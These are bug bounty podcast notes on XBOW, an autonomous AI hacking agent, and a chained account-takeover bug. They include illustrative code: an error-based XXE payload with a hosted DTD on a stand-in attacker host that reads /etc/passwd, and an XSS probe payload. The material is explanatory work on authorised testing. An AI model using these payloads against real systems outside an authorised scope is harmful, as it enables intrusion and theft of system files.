Critical Thinking - Bug Bounty Podcast
[HackerNotes Ep. 134] XBOW - AI Hacking Agent and Human in the Loop with Diego Jurado
In this episode we’re joined by Diego Jurado to give us the scoop on XBOW. We cover a little about its architecture and approach to hunting, the challenges with hallucinations, and the future of AI in the BB landscape. Diego also shares some of his own hacking journey and successes in the Ambassador World Cup.
Hacker TL;DR
API Chain Exploitation: Diego chained multiple vulnerabilities into an account takeover: an API downgrade (v5→v2), a method change (POST→GET), JSONP callback parameter injection, and an AEM dispatcher bypass that yielded XSS on a whitelisted domain, defeating the referrer-based access controls. Great chain!
Advanced XXE Techniques: After direct XXE against Akamai CloudTest's SOAP endpoint failed, exploitation required a more sophisticated approach: hosting a malicious external DTD, crafting error-based payloads that force specific error conditions, and targeting /etc/passwd with external entity references.
AI-Driven JS Analysis: XBOW autonomously identifies empty JavaScript variables as potential XSS vectors by reasoning they may be populated from query parameters. This wasn't explicitly prompted but emerged from the AI's independent analysis.
XBOW Using Headless Browsers: Advanced DOM vulnerability detection using Chrome DevTools Protocol enables monitoring DOM modifications, JavaScript event listeners (particularly postMessage handlers), console activities, and HTTP requests without traditional debugging. This allows automated systems like XBOW to identify complex client-side vulnerabilities like DOM-XSS and postMessage attacks that typically require manual testing.

Tired of endless application approval requests slowing down your team?
The ThreatLocker User Store automates access to safe, pre-vetted software. Eliminate shadow IT and slash helpdesk tickets while strengthening your Zero Trust framework.
Bring a BUG! - Account Takeover with Multi-Step Chained Attack
To kick off, Diego showed us an account takeover that required chaining multiple vulns. The target was a company with an identity management system that had an endpoint to validate user tokens and retrieve access scope information.
The first step exploited an API downgrade vulnerability. The original endpoint was /api/v5/token, which required a client ID in the POST body. By downgrading from v5 to v2, Diego and his teammate were able to change the request from POST to GET while maintaining functionality, opening the door for the next attacks.
Next, they discovered JSONP support on the endpoint. When adding a callback parameter to the request, the response would be wrapped in a JSONP structure, enabling cross-domain access to the response data. However, not all origins were allowed to make these requests, as the server implemented referrer-based access control. Only requests coming from specific whitelisted domains would receive valid data.
This presented a challenge: they needed to find an XSS or similar vulnerability on one of the whitelisted domains. After examining the whitelisted domains, they discovered one was running Adobe Experience Manager (AEM). Diego identified a dispatcher bypass vulnerability that allowed them to exploit an XSS on the whitelisted domain. With this XSS, they were able to make a request to the vulnerable endpoint with the proper referrer, completing the chain that led to account takeover.
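To make the downgrade and JSONP steps concrete, here's a minimal Python sketch. The endpoint shape, parameter names, and helper functions are illustrative guesses based on the description above, not the real target's API:

```python
from urllib.parse import urlencode

def downgrade_to_get(client_id: str, callback: str) -> str:
    """Rebuild the v5 POST token request as a v2 GET with a JSONP callback."""
    params = {"client_id": client_id, "callback": callback}
    return f"/api/v2/token?{urlencode(params)}"

def looks_like_jsonp(body: str, callback: str) -> bool:
    """A JSONP-capable endpoint wraps its JSON response in callback(...)."""
    b = body.strip()
    return b.startswith(callback + "(") and b.endswith(")")
```

Once the response comes back wrapped in the callback, any page that can load it as a script (and that passes the referrer check) can read the token data cross-domain, which is what made the whitelisted-domain XSS so valuable.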
This part of the pod was mainly Diego describing how XBOW works and “thinks”; for a full walkthrough of the bug, check the link in the title of this section.
XBOW was initially given a URL from a HackerOne program and tasked with finding file read vulnerabilities. During its exploration, it discovered a SOAP endpoint at /repository/service. The AI recognised this as a potential target for XML External Entity (XXE) attacks based on response characteristics that suggested XML processing.
After identifying the target, XBOW began testing various XXE payloads. It first attempted direct XXE exploitation, which failed, leading it to try in-band, out-of-band, and error-based payloads. It then located additional documentation in a WSDL file that provided more information about the service.
An interesting part was hearing about how it handled out-of-band exploitation. It crafted and hosted a malicious DTD file on its attack machine, then created an error-based XXE payload that referenced this DTD. The payload was designed to point to a non-existent file to force an error condition while simultaneously attempting to read the /etc/passwd file. When executed, this technique successfully retrieved the content of the system file, confirming the vulnerability.
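The hosted-DTD trick is easier to picture with the payloads written out. This is a generic sketch of the error-based XXE technique, the attacker URL is a placeholder and the exact payloads XBOW used weren't shared:

```python
# Placeholder for the DTD hosted on the attack machine.
ATTACKER_DTD_URL = "http://attacker.example/evil.dtd"

# Hosted DTD: reads /etc/passwd, then forces an error by embedding the
# file's content in a path that cannot exist, leaking the content in
# the resulting error message.
evil_dtd = """\
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
%eval;
%error;
"""

# Sent to the SOAP endpoint: pulls in the external DTD, triggering the chain.
xxe_payload = f"""\
<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY % dtd SYSTEM "{ATTACKER_DTD_URL}">
  %dtd;
]>
<root/>
"""
```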
An interesting aspect of this case study was that the AI's reasoning trace contained some hallucinations. For instance, it referenced a non-existent CVE and incorrectly described the evolution of the product. Even when intermediate reasoning steps contain inaccuracies, the AI can still reach correct conclusions, because validation steps confirm the vulnerability is real before it's reported.
XBOW AI Architecture and Capabilities
XBOW is an autonomous AI-based bug bounty system that has discovered over 1100 vulnerabilities without human intervention. Diego provided insights into how this AI system functions and its architecture.
At a high level, XBOW employs a "coordinator" that oversees the bug hunting process. The coordinator performs initial discovery, identifies endpoints, and then spawns multiple "solvers", effectively individual AI pentesters with specific objectives. For example, one solver might be tasked with finding XSS vulnerabilities on a particular endpoint, while another might search for SQLi on a different part of the application.
Each solver operates independently with its own isolated "attack machine", an environment that includes various tools for vulnerability discovery and exploitation. These attack machines are isolated from XBOW's infrastructure to prevent security risks if a target attempts to counter-hack the system.
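As a rough mental model of the coordinator/solver split, here's a sketch. The class names, objectives, and sandbox naming are illustrative, not XBOW's real internals:

```python
from dataclasses import dataclass, field

@dataclass
class Solver:
    objective: str       # e.g. "XSS" or "SQLi"
    endpoint: str        # endpoint this solver is scoped to
    attack_machine: str  # isolated environment assigned to this solver

@dataclass
class Coordinator:
    target: str
    solvers: list = field(default_factory=list)

    def spawn_solvers(self, endpoints: list) -> None:
        """After discovery, assign one solver per (objective, endpoint) pair."""
        objectives = ["XSS", "SQLi"]
        for i, ep in enumerate(endpoints):
            for obj in objectives:
                self.solvers.append(
                    Solver(objective=obj, endpoint=ep,
                           attack_machine=f"sandbox-{i}-{obj.lower()}")
                )
```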
One particularly interesting aspect of XBOW's architecture is its harness system, which includes:
Headless browsers for client-side testing and verification
Exfiltration servers using InteractSH for out-of-band callbacks
Payload hosting services for exploits requiring external resources
Network monitoring and proxying to enforce scope boundaries
The system can generate and execute Python scripts to test multiple payloads efficiently within a single iteration. This allows it to try various attack variations without consuming excessive computational resources. XBOW implements safeguards to prevent testing out-of-scope assets by checking program policies and implementing proxy rules that block traffic to unauthorised domains.
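The scope safeguard can be pictured as a simple allowlist check at the proxy layer. The allowlist format and function below are assumptions for illustration, not XBOW's actual proxy rules:

```python
from urllib.parse import urlparse

# Hypothetical in-scope assets pulled from a program's policy.
IN_SCOPE = {"app.example.com", "api.example.com"}

def allowed_by_proxy(url: str) -> bool:
    """Block any request whose host is not an in-scope asset or subdomain."""
    host = urlparse(url).hostname or ""
    return host in IN_SCOPE or any(host.endswith("." + d) for d in IN_SCOPE)
```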
A significant advancement in XBOW's capabilities is its ability to handle authentication and maintain state across requests. The system passes context from the coordinator to solvers, ensuring they have all the necessary information about authentication sessions and navigation paths to reach specific endpoints. To identify itself during testing, XBOW sends a custom X-Bow header with each request. This header changes regularly to prevent impersonation and helps companies identify when XBOW is testing their systems.
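A rotating identification header could be derived from a shared secret and a time window. This is purely a hypothetical sketch, since the real X-Bow header's format and rotation scheme aren't public:

```python
import hashlib
import hmac
import time

# Hypothetical secret shared with participating programs.
SECRET = b"shared-with-participating-programs"

def identification_header(period_hours: int = 24) -> dict:
    """Derive a token that changes each rotation window, so a stale
    value can't be replayed to impersonate the scanner."""
    window = int(time.time() // (period_hours * 3600))
    token = hmac.new(SECRET, str(window).encode(), hashlib.sha256).hexdigest()[:16]
    return {"X-Bow": token}
```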
JavaScript Analysis and DOM Testing
Diego shared insights into XBOW's sophisticated approach to finding client-side vulnerabilities. One particularly impressive capability is how it analyses JavaScript code to identify potential injection points.
In the example of the Global Protect XSS vulnerability, XBOW examined the JavaScript response and identified empty JavaScript variables that might be controllable through user input. The AI reasoned that these empty variables could potentially be populated with data from query parameters, making them prime targets for XSS testing. This demonstrates a level of code analysis and intuition that goes beyond simple pattern matching or payload testing.
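A crude version of that "empty variable" heuristic can be sketched with a regex. Real JS analysis would need a proper parser, so treat this as illustrative only:

```python
import re

# Flag JS variables assigned an empty string: they may later be
# populated from query parameters, making them XSS candidates.
EMPTY_VAR = re.compile(r"\b(?:var|let|const)\s+(\w+)\s*=\s*(?:\"\"|'')\s*;")

def empty_js_variables(js: str) -> list:
    return EMPTY_VAR.findall(js)
```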
For DOM-based vulnerabilities, including postMessage attacks, XBOW uses headless browsers via Chrome DevTools Protocol. This allows it to:
Examine the DOM structure and modifications
Monitor JavaScript event listeners, including postMessage handlers
Track console logs and errors
Host HTML POCs to demonstrate exploitability
The system doesn't currently have direct access to browser breakpoints or step-through debugging, but it can observe DOM and console changes to infer how the application processes data. This has enabled XBOW to discover postMessage vulnerabilities by identifying message listeners and crafting exploits that trigger them.
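That monitoring setup maps onto a handful of real CDP domains. The sketch below only builds the enable commands; the websocket session that actually delivers them to Chrome, and how XBOW wires it up, are omitted:

```python
import json

def cdp_setup_commands() -> list:
    """Serialise the CDP commands that turn on the relevant event streams."""
    methods = [
        "Runtime.enable",   # console messages and exceptions
        "Network.enable",   # outgoing HTTP requests
        "DOM.enable",       # DOM structure and modifications
        "Page.enable",      # navigation lifecycle events
    ]
    return [json.dumps({"id": i + 1, "method": m, "params": {}})
            for i, m in enumerate(methods)]
```

Event listeners, including postMessage handlers, can then be enumerated with methods like `DOMDebugger.getEventListeners` against objects on the page.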
To verify XSS vulnerabilities, XBOW runs the payload in a headless browser and confirms that the expected action (like an alert) actually executes. This validation step eliminates false positives for client-side issues and ensures that only real, exploitable vulnerabilities are reported.
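That validation step boils down to correlating a unique marker. Here's a sketch, with the event capture itself (e.g. via CDP's `Runtime.consoleAPICalled`) stubbed out as a plain list:

```python
import secrets

def make_probe() -> tuple:
    """Build a payload that logs a unique marker if it executes."""
    marker = f"xbow-{secrets.token_hex(8)}"
    payload = f'"><img src=x onerror=console.log("{marker}")>'
    return payload, marker

def confirmed(console_events: list, marker: str) -> bool:
    """Only report the XSS if the probe actually executed."""
    return any(marker in e for e in console_events)
```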
False Positive Reduction and Validation
One of the most significant challenges for automated security testing is false positives. Diego emphasised that XBOW prioritises accuracy over quantity, implementing various validation mechanisms to ensure reported vulnerabilities are legitimate.
For XSS vulnerabilities, XBOW uses headless browsers to execute the discovered payloads and verify that they trigger the expected behaviour, such as displaying an alert dialogue. This approach has effectively eliminated false positives for XSS detection.
SSRF validation was more challenging. Initially, XBOW struggled with false positives when the AI attempted to use external services to trigger callbacks to its InteractSH server. The team addressed this by implementing stricter proxy rules and DNS configurations to prevent direct external requests, ensuring that any callbacks received truly indicate server-side request processing.
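The fix amounts to correlating each test with a unique callback host, so only resolutions carrying this test's token count as a hit. A sketch, with a placeholder OAST domain standing in for the real interactsh setup:

```python
import secrets

def unique_callback(base: str = "oast.example") -> tuple:
    """Mint a per-test token and the callback host built from it."""
    token = secrets.token_hex(6)
    return token, f"{token}.{base}"

def server_side_hit(interactions: list, token: str) -> bool:
    """True only if the target server resolved our unique subdomain,
    i.e. the interaction host carries this specific test's token."""
    return any(i.get("host", "").startswith(token + ".") for i in interactions)
```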
For open redirect vulnerabilities, validation is relatively straightforward as the system can directly observe whether a redirect occurs as expected. But some vulnerability types, like information disclosure, remain difficult to validate because checking if the exposed information is sensitive requires human judgment.
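The open-redirect check really is that direct, roughly (the function name and host-matching rule are my own simplification):

```python
from urllib.parse import urlparse

def redirect_confirmed(status: int, location: str, attacker_host: str) -> bool:
    """Confirm the finding only when the response actually redirects
    to the attacker-controlled host."""
    if status not in (301, 302, 303, 307, 308):
        return False
    return urlparse(location).hostname == attacker_host
```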
If you want to know more, XBOW will be presenting details about their validation system at Black Hat this year!
Bug Bounty Performance
XBOW reached #1 on HackerOne's leaderboard in just three months. Diego responded to critics claiming XBOW only finds XSS vulnerabilities, particularly regarding repeated Global Protect XSS reports.
While XSS is a large portion of their findings, there’s a lot more in XBOW's vuln portfolio:
15 Remote Code Execution (RCE) vulnerabilities in three months
32 SQL Injection vulnerabilities in 90 days
XXE vulnerabilities like the Cloud Test example
Various other high-severity issues
Being at the top of the leaderboard inevitably means finding and reporting many of the same types of vulnerabilities, as these are the most commonly occurring issues across programs. Even top human hunters don't reach leaderboard positions by reporting only RCEs, which are relatively rare.
Regarding the Global Protect findings, while they did find a specific XSS vulnerability that affected many implementations, they also reported it responsibly to Palo Alto Networks first. Many of these reports were marked as informative or N/A on HackerOne since companies often don't accept reports for CVEs, meaning XBOW's reputation points didn't primarily come from these findings.
XBOW uses bug bounty programs mainly as a "playground" to improve the product, test new capabilities, and validate its approach across diverse applications and environments. They focus exclusively on HackerOne rather than other platforms because it provides sufficient diversity for their testing needs.
Prompting and AI Training Approach
Here are some insights on how XBOW's prompts are structured. For vulnerability types that the AI might not thoroughly test by default, such as postMessage vulnerabilities or serialisation-based XSS, the team develops technical prompts that guide the AI to try specific techniques:
Providing as many details as possible about the attack techniques to test improves performance
Generic descriptions tend to result in the AI testing only typical payloads while missing more complex techniques
Specifying endpoints and vulnerability types narrows the focus and improves efficiency
Python generation is favoured as it allows testing multiple payloads in a single iteration
Some models perform better with Python than with other tools like cURL, influencing their approach to code generation.
The AI team at XBOW works with the security researchers to refine prompts, with researchers providing technical details about attack techniques while the AI specialists optimise the prompt structure for better performance.
Interestingly, XBOW had an affinity for identifying empty JS variables as potential injection points; this behaviour was not explicitly prompted, so it apparently came from the model's own analysis. This suggests that the underlying models have internalised certain security testing approaches that weren't explicitly taught through prompting.
The Future of AI in Bug Hunting
Complex vulnerability chains like the multi-step account takeover remain challenging for AI systems. That said, XBOW is already chaining some vulnerabilities together, like using SSRF to achieve local file inclusion.
Right now, XBOW isn't making any money; inference costs exceed bounty earnings. But with operation costs expected to drop over the next year, autonomous bug hunting will eventually become economically viable. This opens the door to AI systems becoming standard security tools.
Diego believes fully autonomous systems will dominate rather than human-in-the-loop approaches. While human intuition and creativity certainly add value, autonomy simply scales better. He thinks there are ways to incorporate human expertise without requiring constant human involvement.
XBOW and tools like it are gonna shake things up for security researchers. Some people will struggle to adapt as AI takes over the easy stuff but there'll still be plenty of work for humans who know their shit.
The researchers who'll make bank in the future are the ones who can do what the machines can't, like chain together complex exploits, spot weird business logic issues, and understand the bigger picture of how systems actually work in practice. AI might be good at finding XSS, but it's not about to understand why a particular workflow in a financial app could lead to fraud.
That’s it for the week,
and as always, keep hacking!